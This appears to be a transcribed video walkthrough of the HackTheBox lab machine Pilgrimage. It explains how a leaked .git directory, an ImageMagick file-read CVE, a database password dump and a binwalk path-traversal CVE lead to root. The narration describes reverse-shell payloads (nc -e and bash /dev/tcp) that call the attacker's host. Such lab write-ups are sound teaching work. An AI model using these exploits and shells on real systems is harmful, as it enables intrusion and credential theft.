What's going on YouTube? This is IpSec. I'm doing Pilgrimage from HackTheBox, which really values recon because a lot of the things in this box look vulnerable, and they are vulnerable. They're just not vulnerable the way you would expect it. For instance, the website is a PHP image upload script, so you'd expect to be able to upload like PHP files and execute them there. However, there is also a source code leak by exposing the .git directory, and if you do that, you can examine the ImageMagick version, and there's an ImageMagick CVE that you can use to get code execution on the box. With that access, you notice there is a process with inotifywait, which is just like a hook on a directory monitoring when files get created. When they do, it runs this bash script that does malware scan. If you examine the bash script, it looks like there is a command injection vulnerability, but there isn't exactly. It's actually a vulnerability within the binwalk version it's using that allows you to write files to the operating system. So with that being said, let's just jump in. As always, I'm going to start off with an nmap, so -sc for default scripts, SV enumerate versions, OA output all formats, put in the nmap directory and call it pilgrimage, and then the IP address of 1010.11.219. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's a Debian server. The next one we have is HTTP on port 80. It's telling us Nginx, and also telling us the server redirects us to pilgrimage.htb. So let's go ahead and add this to a host file. So sudo vi etc host. Then we can add 10.10.11.219 and say it's pilgrimage.htb. So there's not really much else we can do. There is a small quirk because this is HackTheBox and we don't have DNS. If our browser already knew this domain, nmap would run a few more scripts. So let's go and actually run this. So I'm just going to copy this and we'll do pilgrimage-new and let that run while we take a look at the server. So I'm just going to go to 10.10.11.219 and we see it is a website that lets us, I guess, shrink image files. So the first thing I'm going to do is find a PNG file. So I'm just going to do locate-r for regex, ends in PNG. I probably should have done like a tail-1 because I always like just grabbing the last file. And we can copy this to this directory. Then choose file. We can navigate to it. It's pilgrimage. And before I upload it, I am going to send this over to Burp Suite so I can see all the requests. Then we can click shrink. And we see it's just going to upload something, has a variable to convert, gives the file name, and then the image file. I'm going to send this over to the repeater tab, and we can also just forward this over in Burp Suite. We see it sends a response back of saying it was successful. If we forward this to our browser, we have a link here to the file, and we see it. So the first thing I'm noticing right off the bat is it renames the file. So if we uploaded a like .php file, I don't think we'd be able to hit it, right? So let's just try changing the extension to PHP. It sends us the message back, and this is where it is, and it is indeed converted to a PNG. So there's no exact or no easy file upload vulnerability here. We could try to guess where the upload directory is because this is the shrunk directory. So my first thought is like try /uploads. We get a not found. Maybe it's just upload. So let's just try running a go-buster to enumerate valid directories, right? So let's do go-buster-u, http. We got to do pilgrimage.htb. Then the word list, up, sec list, discovery, web content, raft, small words.txt. We know it's a PHP, so I'll do the extension PHP. And then we can say the out file, and I'll just call this root.gobuster.out, I guess. That looks good to me. We need to put it in directory mode. And now it is going to brute force. There is a /tmp directory. So we can try navigating there, and we just get a forbidden. So we could try the file we gave it. Let's see, that was zenity.php, and see if it just exists here. Maybe it gets uploaded to this temp directory and then moves over after it gets converted. and we get not found. There could be some type of race condition here, right? Because maybe by the time this responds, it deletes the image out of temp. I don't know that, and I hate like just testing for race conditions right off the bat. I'd rather do that at the end because we may have the source code and be able to see exactly what goes on under the hood. So going back to the Go Buster, I thought it would show us a .git. I know this is in the word list. It may just take a while to see. But if I went back over the nmap directory, one of the nmap scripts does look for .git. So it says it found this repository. And again, it only showed this because we had updated a DNS entry and then reran it. Because nmap went to scan it, it responded with saying, hey, this is the location. And nmap said, okay, I'm not going to run any more scripts. Once we scanned it and we had the correct domain, so it didn't go to that location, it ran more scripts. So we have a Git repository, and I'm going to run the tool Git-Dumper. You can just use like pip3 to install this if you don't have it. And we just specify the URL and directory we want to dump to. So we'll do Git-Dumper, and then the URL is going to be http pilgrimage, if I can spell this correctly, .htb, there we go, and then .git, and then we'll output it to the source directory. And we can see it is fetching all the objects. So if I now go into source, we have it here, we can do a git log, and there's no other like commit history. So there's just one. Let's open up in Visual Studio Code and see what we have here. So it looks like there is a few PHP scripts. We didn't look at register, login, log out. We could take a look at those functions while we go. If I just go to register, let's do ipsec password. And then the dashboard is just going to show a history of shrunken images, right? So if I re-upload this when I'm logged in, let's do choose file, Zenity, shrink, go to my dashboard. It's going to show me I did shrink that image, right? So that's all that does. I see DB prepare, so I'm guessing, yep, this is a prepared statement. So there's no SQL injection there. If we go over to dashboard, I'm really curious like what that temp directory is, right? And maybe that was index. Search for temp. And we can see what it's doing here. So if the request method is a post, it's going to create a new, I guess, image object. I don't know exactly what new bulletproof image is. If you use PHP a lot, maybe you know this. I don't. But it's going to set the location to temp, set the size, set the MIME type, and then upload it. And eventually, it's going to run an exec. And it hits this binary, magic, and then does convert, and then this output. And we don't have control over the file name because I'm guessing this is just going to be like a PHP random name. If we did have control of the file name, we could probably get code execution here, right? We could test for that with just like a ping. So if we do sudo tcp dump -i ton 0, let's see, -n for no DNS. I think I do -v as well, and then ICMP. That should work. Now I want to see where ping is installed. I think user bin, okay. It was either user bin or user sbin, right? And we could go back here and try doing some type of command injection. Let's just try like semicolon, user bin ping 10.10.14.8. And I always forget, is Linux -c or -n? Ping -c1 127.0.0.1. It is -c. And then we send this request. We could also try a different way to do code execution like this. And looking back, we don't have the server sending us a ping. So I don't think that is vulnerable to command injection. But if we look at our source directory, we do have that magic binary. So we can see exactly what this is. So I'm just going to do file magic, and we see it is a executable. If we strings it, and then grep-i version. Do we have anything? Let's see. We have version %s right here. So that's a format string. We could just try executing it. Always do this in a VM, not a machine. And I would probably do a snapshot before executing it and then revert, right? If we do a -- version, we can see it is part of ImageMagick and 71049. I'm curious, if we use toStrings magic grep for this, it is not there. Let's see, encoding L, S, B. Huh, I'm surprised I did not find it. Weird. Okay. I'm just kind of curious how it stores that string. But we do see it is 71049, so we can Google any type of exploit for this real quick. So ImageMagick. Oh, that was on my clipboard. Let's just do exploit and see. And there is this Metabase article. And this is probably the best thing to understand the exploit. And it's pretty detailed. I would read it if you want to know more. But essentially, ImageMagick has this thing called a profile. And profiles, I think, is for like color management. But it will... Come on, cookies. Let's see. Where is it? So the malicious actor could craft a PNG or use an existing one with a textual chunk type of text. These types have keywords and a text string. If the keyword is profile without quotes, then ImageMagick will interpret the text string as a file name and will load the content as a raw profile. If the specified file name is a dash, then ImageMagick will try to read the content from standard input and potentially leave the hanging process waiting forever. So there's two things we could potentially do with this. If it loads the profile and embeds that to the file we get, we'll be able to exfil files. If it doesn't, and we could potentially use a dash, and that will cause the server to hang and not clean up the file right away, and we may be able to find it in the temporary directory. I'm going to try the LFI one first, but maybe beyond root, we'll go play with this and see if we can get files to stay in temp longer than they should, right? So I don't think there's a good POC on that, but on GitHub, let's see. If I just add GitHub to this exploit, or this one probably will work. ImageMagick LFI POC. Okay, so we just do generate, give it a file, and give it an output. So let's try this. So we'll do git clone. Let's go up one directory. And this PNG module, if you don't have it, if you get an error, you'll want to do pip3 install py-png. I think that's the module. Let's see if it finds it. Yep, this is the module you want to install for that PNG. So if we just do Python 3 generate, then -f, let's do the etc passwd example, -o exploit.png. It's going to create a blank PNG, place the payload, and then execute it, right? And if you wanted to look at this code, we could see what it does, right? So it creates a PNG with height 255. It's just going to give it a gradient. And then here is the actual exploit. We're going to do this. Then we add the text, the profile. And then, let's see, where are we appending it to? Oh, right here. So we're adding the profile here, right? So we added the text profile, give it the L file. This is the etc passwd in our example when we just ran it. And then we open the image that we created, which is just a gradient. And then we save the profile to that. If we exif tool on exploit, is there a profile now? There is. So we can see profile etc passwd. So let's go and upload this. So if we go to shrink image, go back to home, choose the file. Okay, we're in this directory, upload our exploit. Then we navigate here. It shows the gradient. We don't have etc passwd, but if we download this, and then let's run exif tool against this, we have a bunch of hex here as the raw profile type. So it has added the contents of etc passwd here. I believe the script uses a binary called identify. Yeah, it does identify -verbose, which gives it a little bit better format because I think these dots are actually line breaks. But if instead we did identify, is it -verbose, verbose on, what do we call it? It was the 655. We have just a hex string here. So what I'm going to do is copy this. I think that 1437 could be the size. I don't know exactly what that is, but this is the hex string. So I'm going to call this passwd.hex, paste it in. And then if we cat it, we can pipe it over to xxd, do -r-p for reverse. And then the P means it's just going to be in this format. And we have the passwd. We can see there is a user Emily on the system. We could also grep everything that ends in sh, and there's just two users, Emily and root. So we could try potentially grabbing Emily's SSH key, but chances are the web server is running as www.data, not Emily, so we can't do anything there. There's no way to write files with this exploit, so we can't drop a PHP file. But if we went back to the source code, it is using a SQLite database, right? Where was that? VarDB pilgrimage. So let's grab this SQLite database. So let's go not generate. Did I do it in, we can just do Python 3, generate.py -f -out, we'll call it exploit.png. Create a new one, and we will upload this to the server. So choose file, exploit PNG, shrink, go here, copy image link. We can wget to download it, and then identify verbose on this file name. And let's copy this over. It is a bit bigger because it's a binary file. We have a lot of null bytes, probably just terminating or separating fields and whatnot. But we can grab this. We'll call it pilgrimage.db.hex. Paste it. Then we can cat it xxd-r-p, direct it to just pilgrimage.htb. I know I spelt that horribly. But we can just do SQLite 3. I want to name it .db and not htb. We'll do db. And let's just fix the name. There we go. And we could just do a .dump. And it's going to dump the database, and we see users, the user I created. We also have Emily with a big chunky boy 123 as the password. So let's try SSH, Emily at pilgrimage.htb. Paste in the password, and we get logged in as Emily. If we do lsla, we can see user.txt. There is a .config directory. If we look here, there is a config for binwalk, which is a bit odd. So we know binwalk is installed on the system. There is a git config file. Looking at it, we don't have anything. If we do ps-ef-forest, I'm going to do less-s. We can look at the running processes on the box. And let's see. We have one thing sticking out that's definitely non-default. And there's bin bash on user malware scan. It's running an inotifywait -m-e create on this directory and then running malware scan against the file. So let's take a look at what this bash script is. So I'm going to cat malware scan, and we see it creates inotifywait, create on this directory, and then while that happens, it reads in the input of this command as file, and then it's going to do a file name, and right here, it looks like we have command injection, right? And that's the first thing I would test for. So we could go back and do our TCP dump. So TCP dump -I ton 0. Let's make that sudo -n-v ICMP. And let's try creating a file that pings us. So it goes in var www pilgrimage.htb shrunk, and we can do touch, and then ping -c1 10 10 14 8, like that. We don't get a ping. We could try user bin ping. Maybe it was the absolute path, and we actually can't because we can't create a file with a slash in it, unfortunately. So, but we still don't get pings. So it doesn't look like we have command execution, even though this just looks like it is. And looks are deceiving. This actually is not vulnerable. So let's look at this first, and then let's explain what inotifywait's doing, right? So if I created a file, let's do v test.sh bin bash, make this executable so I can just execute it. We can echo 1. So if I just do test, please subscribe, it's going to echo please. If I put this in quotes, then it would do please subscribe, because if it's quotes, this will be treated as one argument. So what I would do is say files is equal to this. And then if we go back here, we can say file name is equal to this. Actually, we can grab this whole thing. And we'll do echo files. Like that. Do I have the right number of quotes? I think I do. We can just echo file name. So if I do /test ipsec, it puts it here. Now, if I did who am I, it still says ipsec because I didn't put who am I in quotes. I used double quotes. It still says ipsec because it's going to do, I'm going to call this expansion. Maybe it's substitution. I don't know what it's called when it translates this variable to the command, right? Maybe it's substitution. But if we put it in single quotes, it still says who am I? And this is a little bit weird because if I catted this file and we just said files is equal to who am I, because I'm not using any quotes here. We could. Let's do that because I think that's what the script does. It uses double quotes everywhere. So if I run that, it still does that. If I edited this, instead of saying files1 or files is equal to that, if I just replace that with who am I, and now we don't need an argument because we just hard coded it, it's going to be ipsec. And what's happening here is the expansion, whatever you want to call the process of converting this command to a variable, when it comes from standard input, that's when it happens. If it assigns the variable, it's not going to do that expansion again. So since we escaped it when we were passing it as this, and we escaped it in the command line, it knows it underwent expansion, it treated it as that, and then the next time the variable saw this string, it said, okay, I don't have to do the expansion, substitution, again, whatever you call it when you translate it. It's just going to treat it as if it were escaped. So hopefully that makes sense why this whole thing is not vulnerable to command injection. So let's go back, and the next piece that probably may have people confused is this inotifywait. What I would do here is just create something. So we can just do this as a low privilege user. Let's cut that file real quick. So we're going to do create. I'm going to say dev shm. So we just changed the directory from this to a directory we can write to. And then I'm going to do that while read file, do echo file done. So I just created an inotifywait task to watch dev shm and print out this variable. I'm going to press Control Z to background it. I'm going to touch dev shm, please subscribe. And then we're going to do FG to foreground the thing we had backgrounded. And we can see it outputted file, and that's dev shm create please subscribe. So that's just saying that inotifywait has triggered in the dev shm. It was a file create on please subscribe. If we didn't specify create, there's like modify, delete, a bunch of other things. But that's what inotifywait does. So let's see. Let's go cat again. So now that we know this, it's doing a inotifywait. This is going to be the file name. And it's going to echo the file, grab the very last line, and then delete everything after create space. So we just have the file name left over. I don't know why it does this tail. I don't think it has to. Maybe it's like a protection of CRLF injection. That would be if we went back to the script, did test.sh, who am I, and then who am I here. That would be CRLF injection, right? If that actually executed. If it was a system command, that's one way you can do it because system would treat multi-lines as different commands. Bash does not appear to, at least when it's passed this way. So that just gets the file name. Then we're going to run binwalk-e, and this -e is extract on file name. And then if the output contains executable script or Microsoft executable, it's going to delete that. So the next step is like, is there any way to get command execution from binwalk? My first bet is always to check like GTFO bins. It doesn't help us here because the parameter was double quoted. So even if we had a different argument, we wouldn't be able to do it, right? We're only limited to this -e. If we did like a file name space -cmd, if that was a command, and then something, it would still treat that all as the file name. It wouldn't go and treat it as different arguments because of the double quotes. So the next thing we have is searching like binwalk exploit. So if we do binwalk RCE, or let's just do binwalk command execution and see if there's anything here. We do have a CVE April 5th, 2023, and it says version 232. Let's just do binwalk -v, -v, -version, -version, -h. Go up. There we go. It is version 232. So it is vulnerable to this. This advisory is going to explain the exploit much better than just the simple POC script. It's going to run this. I guess let's run the exploit and then we'll go back and understand it. So I'm going to, I thought there was a copy button. Let's just do view raw. We can download this. Let's curl -o binwalk 232.py. Did that save? It did. So if we do Python 3 binwalk 232, it wants a file, IP, and port. So let's just call this exploit 10.10.14.8 9001. No such file or directory. How does it want it created? Do they have a help? It wants a PNG file. Let's just do exploit.png. touch exploit.png. Maybe I'm on the wrong exploit. Let's XXD this. Yeah, it's not a PNG file, it's a PFS file. This will make more sense in a second once we go over this. Really weird. Okay, let's do dev shm. Oh, we actually want to create that file in this directory, right? Because whenever we create a file here, the inotifywait command is going to run as root and binwalk it. So let's curl 10.10.14.8, 8000, binwalk exploit.png -o binwalk.png, I guess. And I was not listening on 9001. That's where we ran it, right? Yeah. binwalk2.png. And it did not execute. What if we binwalk it ourselves? Does PFS file system and nothing. Oh, if we do it ourselves. Oh, we've got root. I think it just took a while for it to work. Right? That did not happen because I ran it here. Yeah, it just takes a while for that, for some reason, to work. So let's take a look at exactly what this exploit does, because that was not helpful, and analyzing this doesn't help me. I couldn't understand from this exploit, but this one definitely helps. So essentially, this is a path traversal bug, and the -e flag will write to the directory, right? We can see it writing to binwalk.png.extracted, binwalk2.png.extracted. So it writes the contents of the file to this, right? So when we binwalked this file, it goes, oh, there's a PFS file system file here. I'm going to extract it and write it to this directory. So there is a path traversal with PFS, and there isn't really any documentation on this. I don't know exactly what a PFS file is, but I think it's like a proprietary format for some weird system found in some embedded devices. Only public documentation comes from this tool, and I think this tool was like him reversing it, right? And they added the PFS extractor plugin in binwalk in 2017. If we look at this file, this is going to be the structure of it. And let's see. They're talking about it. The issue is just the path command they did. They should have done absolute path, which would get rid of it. I'm looking for the file they used. Binwalk API. Commit, introduced. Let's see, I think it was at the top. This is not it. Pull request, maybe this one. I'm looking for where he gave an example file. Here it is, poc.zip. So let's save it, HTB. Oh, that's wrong. Let's do cp htb.zip, poc.zip, unzip it, and we can xxd the malicious.pfs. So this is what it looks like, and it's very similar to a tar archive. So binwalk sees this, it discovers it's a PFS file system, and then it grabs this file name And when it writes it to this directory. Now, keep in mind that its normal directory is in like this .extracted pfs root. It's in here. So when we're doing // we're escaping this directory, right? So that is kind of why that works. So that's why we can write any file we want to the disk, as long as we have permission. So the next step is just kind of understanding this format. And the documentation is pretty bad, but we can kind of guess at it right from this. So let's see, make for handling. Oh, it's a Siemens SX551 router config or something. So yeah. LZMA is going to be some encryption, or not encryption, compression. We don't have any of that. We're just doing plain text. So this is what we want to focus at. The first 8 bytes is just the magic bytes. We have 8 bytes here, and that just says it's PFS09. Then there's 4 null bytes afterwards. So 1, 2, 3, 4. Okay. And then they don't know what the next 2 are. So this is unknown. And then the next 2 bytes is little endian format for the number of files. So that's why it's just 1 here, because there is 1 file. Then you have the file name here. And there's a lot of just data, but we can just look at where it starts with the file content at the end. And then before that is the file size, right? So here's where the file begins. It's probably going to be right here is the file size. So C1. If we do Python 3, 0xC1, that is 193. So let's see, where does this begin? So let's see. Well, probably right here. So that would be 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D. So that's probably 0x9D is my guess. So we begin at 157, and we're going to end at 0x15, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, 358, 48. So if we do this, I'm going to guess it is close to 193. It's probably going to be like 192 because I'm bad at counting, or 191. I probably missed 1 byte, right? But that is the file size if I could actually count properly. And this may not actually be part of the file. If that was 156, that'd be 192. So that is the size. And if we look at the actual plugin, let's just, let's see, what's a good way to show this? I think he shows it in his blog. Here it is. So he takes advantage of the binwalk plugin. And the first time, he checks if the path doesn't exist, then he runs the command. If the path does exist, then he removes the plugin itself. So this is a way just for it to auto clean up so we can write to it, right? But he also talks about if he wanted to, he could have just like dropped a SSH key or something, right? We can drop files anywhere we want, but the binwalk plugins is the logical place because that's going to work against any operating system, right? So now that we know everything, let us go back to this ImageMagick LFI POC, or not that one, the binwalk exploit. So let's cat it, or we can just copy and paste. That works the best. Binwalk 232. Oh. So I guess they do the hex. This is going to just be 1 file and it gets us to the lines, right? That's what's happening. V exploit.hex, paste this, xxd-r-p to exploit.pfs. Yeah, so they're writing the binwalk.py plugin, which is just going to be this one. And they don't actually put the Python script in the exploit script, right? What they did was they got all like the bytes in place to get where they can just embed a file. And then add it here, right? So if we copy this, let's see, probably don't want this work. Python 3, no. Let's just copy this out. This copied horribly. Is it dash V? No. There was a flag to go. There we go. Args is not defined. So we need args.ip and args.port. We can just do IP port. IP is equal to port is equal to okay, for line in lines, print line. I guess we should strip the new line character. But here we can see the actual Python script. So it's the very similar to what we did, except now it's going to do os.system nc 10.10.14.8 9001-e bin bash. So if the netcat did not have that -e flag on the box, this exploit script would not work. Let's just try changing the exploit script now that we know that. Let's see. So import if path not exist. We're here. So let's do bash-c. Then can I escape that? Bash-i. Dev TCP. Let's just do 10.10.14.8. We'll hard code everything. Man, I really don't like how they did that. This is ugly. So yeah, and 1. Escape. I think that's good. Open temp. So now it's deleting it. Let's just do 9002. I'm doing that because there may be artifacts that are still working, and I may get a shell on 9001 already. So I want to make sure that does not happen. So that may work. Let's get rid of these two. I don't know why they want a PNG file, but Python 3, let's touch lol.png, Python 3, binwalk on, is it -f? No namespace IP. There we go. Okay. So you can now rename and share binwalk exploit. So if I just run strings against it, we can see, and this looks like it's right. If I did xxd, that's where all this would be. The only thing I'm questioning is I didn't see it actually change the file size. So there's a chance that the exploit just doesn't write this full Python script, which would suck, but we'll see. So it's binwalk exploit. We already are listening. Okay. Curl. We'll call this binwalk 3. And see LVNP 9003 or 9002. Curl it and immediately get a shell. So modifying it did work. That's how we could change it away from NC. Hopefully, you enjoyed that. There's one last piece I kind of wanted to look at before we wrap up this video, and that is the file name that gets uploaded with this ImageMagick exploit. So what I'm going to do, let's just get a proper shell on this. Do we have SSH? Make dir.ssh. Let's do SSH keygen pilgrimage. Okay. Cat pilgrimage.pub. Want to copy this. v.sh. cd.sh. Echo authorized keys. sh-i pilgrimage root at 10.10.11 to 19. Let's just do the host name. Pilgrimage.htb. There we go. Now we have a proper shell. So let's go over to for www pilgrimage/temp. And there's no files in this temp directory. And if you remember, this is the one piece we are really confused about, that if it's done insecurely, we would be able to get code execution, because when we upload a image, it goes in this temp directory, and I think our direct upload does. And if we put a PHP script here, can guess the PHP script's name, then we could potentially get code execution in this directory. So we want to see what the file is being created. We could easily just edit the script here and print out the name and do it that way. But since we've used inotify already once, let's use it again, right? So let's do inotifywait -m-e create. I'll do pwd for this directory. And then we say while. We can probably just do this. We don't need that while loop, right? Yeah. So if I went in temp and we touch ipsec, it outputs that, right? The only reason the script used while is they wanted to take multiple actions, but here we just want to see the file create. So now we can go back to our upload and we can just upload a PNG file. And let's see. Did it not even go here? Image shrink failed. Huh. Zenity. This is the one we kept using, right? And we didn't get anything. Does it only watch one? Let's try. Send. No. I wonder if we don't specify a -e. I think that would probably watch everything. Give it this. There we go. So it wasn't a create, it was a move, I guess. And nowhere here do we see the word Zenity. So it's not actually ever dropping that PHP or image file into this directory with the file name we gave it. If we go to our script, let's see. You can do file name, please subscribe. send it, and we don't ever see it. Set up again, just in case. Yeah. So if we ever saw like please subscribe.php in this directory, then we know there's like a race condition we could try to exploit. It looks like there may be something random, and then like this whole string looks like it could be random. So there's no way we can like ever win that race condition to exploit it. That being said, the other piece I want to do is test if we could just have it not delete the file. So let's say it did create the .php and we wanted to reliably win it and make sure a request is like right here before this delete command. The one exploit said if we specified the file name as a dash, it would just read it from standard in. So let's try this. Let's go back to our ImageMagick LFI POC, edit the generate.py, search for the word profile, and instead of args L file, actually, we can just say L file is dash. So let's do Python 3, generate, what's it want? Let's see. Generate dash F, we'll do dash O. We'll call this hang.png. And let's do exif tool, hang.png. The profile is just a dash. So when the script hits this exec and tries to convert it, it should hang here and not do the delete, if I'm understanding this correctly. And I have not actually done this before, so this could be a case of the demo gods, and I may be wrong. But hopefully I'll see new things pop up and delete won't be there. So choose file, we'll choose hang.png, shrink it, and we still see delete. So that whole piece, I guess, did not work. I'm not sure exactly why. I thought it would hang, but it didn't. I think I'll leave this piece in and just wrap up the video. So hope you guys enjoyed that. Take care, and I will see you all next time.